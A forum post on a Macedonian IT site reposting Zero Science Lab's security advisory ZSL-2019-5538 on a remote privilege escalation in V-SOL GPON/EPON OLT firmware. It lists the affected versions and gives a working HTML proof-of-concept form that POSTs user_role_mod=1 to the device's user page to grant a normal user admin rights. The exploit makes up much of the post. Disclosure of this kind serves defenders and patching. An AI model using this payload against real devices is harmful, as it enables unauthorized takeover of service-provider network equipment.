1. Здраво и добредојдовте на форумот на IT.mk.

    Доколку сеуште не сте дел од најголемата заедница на ИТ професионалци и ентузијасти во Македонија, можете бесплатно да се - процесот нема да ви одземе повеќе од 2-3 минути, а за полесна регистрација овозможивме и регистрирање со Facebook и Steam.
    Сокриј

V-SOL GPON/EPON OLT Platform v2.03 Remote Privilege Escalation

Дискусија во форумот 'Ранливости // Експлоити // Закрпи' започната од zeroscience, 26 Септември 2019.

  1. zeroscience

    zeroscience
    ZSL Bot v4.89.1.00

    611
    509
    31 Мај 2010
    Код:
    V-SOL GPON/EPON OLT Platform v2.03 Remote Privilege Escalation
    
    
    Vendor: Guangzhou V-SOLUTION Electronic Technology Co., Ltd.
    Product web page: https://www.vsolcn.com
    Affected version: V2.03.62R_IPv6
                      V2.03.54R
                      V2.03.52R
                      V2.03.49
                      V2.03.47
                      V2.03.40
                      V2.03.26
                      V2.03.24
                      V1.8.6
                      V1.4
    
    Summary: GPON is currently the leading FTTH standard in broadband access
    technology being widely deployed by service providers around the world.
    GPON/EPON OLT products are 1U height 19 inch rack mount products. The
    features of the OLT are small, convenient, flexible, easy to deploy, high
    performance. It is appropriate to be deployed in compact room environment.
    The OLTs can be used for 'Triple-Play', VPN, IP Camera, Enterprise LAN and
    ICT applications.
    
    Desc: The application suffers from a privilege escalation vulnerability.
    Normal user can elevate his/her privileges by sending a HTTP POST request
    setting the parameter 'user_role_mod' to integer value '1' gaining admin
    rights.
    
    Tested on: GoAhead-Webs
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                                @zeroscience
    
    
    Advisory ID: ZSL-2019-5538
    Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5538.php
    
    25.09.2019
    
    --
    
    
    <html>
      <body>
        <form action="http://192.168.8.200/action/user.html" method="POST">
          <input type="hidden" name="user_name_add" value="" />
          <input type="hidden" name="user_password_add" value="" />
          <input type="hidden" name="password_confirm_add" value="" />
          <input type="hidden" name="user_role" value="0" />
          <input type="hidden" name="user_password_mod" value="test" />
          <input type="hidden" name="password_confirm_mod" value="test" />
          <input type="hidden" name="user_role_mod" value="1" />
          <input type="hidden" name="option_um" value="17" />
          <input type="hidden" name="who" value="1" />
          <input type="submit" value="Escalate" />
        </form>
      </body>
    </html>
    

    Zero Science Lab » V-SOL GPON/EPON OLT Platform v2.03 Remote Privilege Escalation
     

Сподели

Вчитување...